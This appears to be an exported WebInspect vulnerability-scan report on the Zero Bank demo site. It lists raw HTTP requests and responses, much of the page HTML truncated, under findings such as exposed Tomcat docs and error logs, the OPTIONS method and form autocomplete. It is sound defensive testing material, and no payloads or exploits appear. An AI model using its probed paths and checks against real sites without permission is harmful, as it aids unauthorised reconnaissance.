OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="f472316d-8b83-461d-83c3-aff77399ca65";
X-Request-Memo: ID="5d2e9ecf-c43d-474b-998d-a8dbcd476ae0"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:47 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1319-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1319
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
<!--Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The JSP Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/admin/index.html

Request:
GET /admin/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="0CF01A02A1917FDBDF9FF1C597F1495C";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e6f10847-378c-4724-90bc-ac074fc8b5b0";
X-Request-Memo: ID="b4bd0c76-c126-434f-9e68-75ad136db2b2"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=680DCF39
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 6602

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Admin - Home</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<h2 class="board-header">Admin Home</h2>
</div>
</div>
<div class="row">
<div class="span3 well">
<ul class="nav nav-list">
<li class="active"><a href="/admin/index.html">Home</a></li>
<li class="divider"></li>
<li><a href="/admin/users.html">Users</a></li>
<li><a href="/admin/currencies.html">Currencies</a></li>
</ul>
</div>
<div class="span8"></div>
</div>
</div>
</div>
<div class="clearfix push"></div>
</div>
<div class="extra">
<div class="extra-inner">
<div class="container">
<div class="row">
<div class="span4">
<ul>
<li><span id="download_webinspect_link">Download WebInspect</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id="terms_of_use_link">Terms of Use</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/

Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
CrawlType="None"; AttackType="None"; OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="86";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="24b6c858-ec1a-49e2-a09a-7d7c72242eb4";
X-Request-Memo: ID="a84d2393-837c-4185-b786-183812f9e186"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 12456

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Personal Banking - Loans - Credit Cards</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<div id="nav" class="clearfix">
<ul id="pages-nav">
<li id="homeMenu"><div><strong>Home</strong></div></li>
<li id="onlineBankingMenu"><div><strong>Online Banking</strong></div></li>
<li id="feedback"><div><strong>Feedback</strong></div></li>
</ul>
</div>
</div>
<script type="text/javascript">
$(function () {
var path = "/";
var featureIdToName = {
"index": "homeMenu",
"online-banking": "onlineBankingMenu",
"feedback": "feedback"
};
if (document.location.href.match(".*" + path + "$") != null) {
$("#homeMenu").addClass("active");
} else {
$.each(featureIdToName, function(featureId, featureName) {
if (document.location.href.indexOf(featureId + ".html") >= 0) {
$("#" + featureName).addClass("active");
}
});
}
$.each(featureIdToName, function(featureId, featu
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/architecture/

Request:
GET /docs/architecture/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/architecture/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="330DD67AE1AC14BED34CAA2093BDE5A3";
PSID="629E4A1BA8397C370A60A994699A4485"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="ad7839ac-dfc5-4af1-b06c-dfc06499c1f6";
X-Request-Memo: ID="4cb9db41-1b9e-4edf-a44f-e1010a448491"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=2313C6AC
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:57 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"7656-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 7656
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7
Architecture (7.0.70) - Table of Contents</title><meta name="author" content="Yoav Shapira"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {
background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {
border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Architecture Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Contents</strong></p><ul><li><a
href="index.html">Contents</a></li><li><a href="overview.html">Overview</a></li><li><a href="startup.html">Server
Startup</a></li><li><a href="requestProcess.html">Request Process</a></li></ul></td><!--RIGHT SIDE MAIN BODY--><td
width="80%" valign="top" align="left" id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0"
cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff" face="arial,helvetica.sanserif"><a
name="Preface"><strong>Preface</strong></a></font></td></tr><tr><td><blockquote>
<p>This section of the Tomc
...TRUNCATED...

Web Server Misconfiguration: Insecure Content-Type Setting


Page:

description

http://zero.webappsecurity.com:80/docs/appdev/sample/sample.war

Request:
GET /docs/appdev/sample/sample.war HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/sample/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C80E2163C3B058B420F9C08BCCC51C62";
PSID="B2C4DB9BD43BD67F563C5590060864D1"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="3e19822b-2222-489c-ab42-6a4446fc16ce";
X-Request-Memo: ID="686c8472-e5a7-47a0-b06b-7f9b9014ae51"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"4606-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Length: 51
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/plain
<truncated>application/x-zip-compressed
Page:

http://zero.webappsecurity.com:80/errors/errors.log

Request:
GET /errors/errors.log HTTP/1.1
Referer: http://zero.webappsecurity.com/errors/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C32128A8498A56E4E6435B6994687E3A";
PSID="BB23AC8A7B9C89C3DE9576C0FEACCA3F"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
X-Request-Memo: ID="7fb39035-d4ae-41aa-a0e7-7b0907724343"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21684-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 21684
Keep-Alive: timeout=5, max=...TRUNCATED...

Informational
Insecure Deployment: Known Application Fingerprint
Page:

description

http://zero.webappsecurity.com:80/admin/index.html

Request:
GET /admin/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/WS_FTP.LOG
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="7080F83BF03970076F4C323DEDEA2BB0";
PSID="DC2EF0E7C935D7C47528CB0D2E9C1565"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="2625804f-5677-4b48-a279-2c736bdc6af0"; AttackSequence="0"; AttackParamDesc="%2fadmin%
2findex.html"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="3872"; Engine="Ws+Ftp+Log+Parser";
SmartMode="NonServerSpecificOnly"; ThreadId="95"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="e258385d-d077-4242-8c30-97be1bd5133e";
X-Request-Memo: ID="341c88c9-8040-448d-8fde-e08b06a8b771"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=02B64950
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:06:36 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Length: 6602

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Admin - Home</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<h2 class="board-header">Admin Home</h2>
</div>
</div>
<div class="row">
<div class="span3 well">
<ul class="nav nav-list">
<li class="active"><a href="/admin/index.html">Home</a></li>
<li class="divider"></li>
<li><a href="/admin/users.html">Users</a></li>
<li><a href="/admin/currencies.html">Currencies</a></li>
</ul>
</div>
<div class="span8"></div>
</div>
</div>
</div>
<div class="clearfix push"></div>
</div>
<div class="extra">
<div class="extra-inner">
<div class="container">
<div class="row">
<div class="span4">
<ul>
<li><span id="download_webinspect_link">Download WebInspect</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id="terms_of_use_link">Terms of Use</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id
...TRUNCATED...

Web Server Misconfiguration: OPTIONS HTTP Method


Page:

description

http://zero.webappsecurity.com:80/

Request:
OPTIONS / HTTP/1.1
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="D068159431A1203405281BA8855269F9";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
OriginatingEngineID="65cee7d3-561f-40dc-b5eb-c0b8c2383fcb"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10282"; Engine="Request+Modify";
SmartMode="NonServerSpecificOnly"; ThreadId="89"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="f2f6015c-e92a-48fe-8a65-552e7459deeb";
X-Request-Memo: ID="60829663-f488-47fe-89c4-54906b05ae3e"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:58 GMT
Server: ...TRUNCATED...

Best Practices
Compliance Failure: Missing Privacy Policy
Page:

description

http://zero.webappsecurity.com:80/

Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
CrawlType="None"; AttackType="None"; OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="86";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="24b6c858-ec1a-49e2-a09a-7d7c72242eb4";
X-Request-Memo: ID="a84d2393-837c-4185-b786-183812f9e186"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 12456

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Personal Banking - Loans - Credit Cards</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<div id="nav" class="clearfix">
<ul id="pages-nav">
<li id="homeMenu"><div><strong>Home</strong></div></li>
<li id="onlineBankingMenu"><div><strong>Online Banking</strong></div></li>
<li id="feedback"><div><strong>Feedback</strong></div></li>
</ul>
</div>
</div>
<script type="text/javascript">
$(function () {
var path = "/";
var featureIdToName = {
"index": "homeMenu",
"online-banking": "onlineBankingMenu",
"feedback": "feedback"
};
if (document.location.href.match(".*" + path + "$") != null) {
$("#homeMenu").addClass("active");
} else {
$.each(featureIdToName, function(featureId, featureName) {
if (document.location.href.indexOf(featureId + ".html") >= 0) {
$("#" + featureName).addClass("active");
}
});
}
$.each(featureIdToName, function(featureId, featu
...TRUNCATED...

Privacy Violation: Autocomplete


Page:

description

http://zero.webappsecurity.com:80/

Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
CrawlType="None"; AttackType="None"; OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="86";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="24b6c858-ec1a-49e2-a09a-7d7c72242eb4";
X-Request-Memo: ID="a84d2393-837c-4185-b786-183812f9e186"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 12456
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/currencies-add.html

Request:
GET /admin/currencies-add.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/currencies.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1196B0700885BAA2AD346331C45F4326";
PSID="0CE5ABD84AD968C95357799ACE262859"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ef7f353c-3e9d-4e37-b8a6-6fd4b408ac64";
X-Request-Memo: ID="6b4a2ec9-b1da-46b3-941c-55a17f95dd47"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:10 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
